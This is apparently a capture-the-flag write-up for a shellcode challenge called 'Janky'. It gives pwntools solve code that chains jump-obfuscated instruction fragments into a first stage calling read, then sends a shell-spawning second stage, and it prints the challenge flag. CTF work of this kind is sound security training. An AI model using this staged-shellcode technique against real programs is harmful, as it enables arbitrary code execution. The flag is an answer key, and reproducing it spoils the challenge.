Skip to main content

Janky

Challenge

Constrained staged shellcode. First stage sets registers for read syscall, second stage sends shell payload.

Solution

Key solve code:

skip = asm("""
jmp here+1
here:
""")
set_rdi_rsi = asm("""
push rdx
pop rsi
xor edi, edi
""")
set_rdx = asm("""
mov al, 255
mov edx, eax
""")
set_rax_syscall = asm("""
xor eax, eax
syscall
""")

first = skip + b"\xe9" + set_rdi_rsi + skip + b"\xe9" + set_rdx + skip + b"\xe9" + set_rax_syscall
p.send(first)
p.send(b"A" * len(first) + asm(shellcraft.sh()))

Flag

gigem{jump1ng_thr0ugh_h00p5}

Challenge
Solution
Flag